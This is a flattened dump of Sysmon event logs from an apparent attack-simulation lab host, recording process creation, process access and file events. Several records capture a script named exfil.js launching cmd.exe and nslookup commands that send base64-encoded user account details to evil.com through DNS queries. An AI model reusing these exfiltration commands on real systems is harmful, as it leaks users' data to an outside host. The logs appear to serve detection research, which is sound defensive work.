14:21:36.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.397{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.397{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5644-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.397{2E1864BB-18E0-629A-6742-000000005F02}39764280C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-5644-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.409{2E1864BB-18F0-629A-5644-000000005F02}2692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvqnkc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.397{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmvfkak.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.382{2E1864BB-18F0-629A-5444-000000005F02}37767468C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5544-000000005F02}5048C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.382{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.382{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.382{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.382{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.382{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5544-000000005F02}5048C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.382{2E1864BB-18F0-629A-5344-000000005F02}40042404C:\Windows\system32\cmd.exe{2E1864BB-18F0-629A-5544-000000005F02}5048C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.385{2E1864BB-18F0-629A-5544-000000005F02}5048C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F0-629A-5344-000000005F02}4004C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmvfkak.tmp 2>&1 10341000x8000000000000000210677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.360{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5444-000000005F02}3776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.360{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F0-629A-5444-000000005F02}3776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.360{2E1864BB-18F0-629A-5444-000000005F02}37767468C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5344-000000005F02}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.344{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5444-000000005F02}3776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.344{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F0-629A-5344-000000005F02}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.344{2E1864BB-18E0-629A-6742-000000005F02}39765748C:\Windows\System32\WScript.exe{2E1864BB-18F0-629A-5344-000000005F02}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.345{2E1864BB-18F0-629A-5344-000000005F02}4004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmvfkak.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.329{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxoam.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.313{2E1864BB-18F0-629A-5144-000000005F02}60723832C:\Windows\system32\conhost.exe{2E1864BB-18F0-629A-5244-000000005F02}4904C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.313{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.313{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.313{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 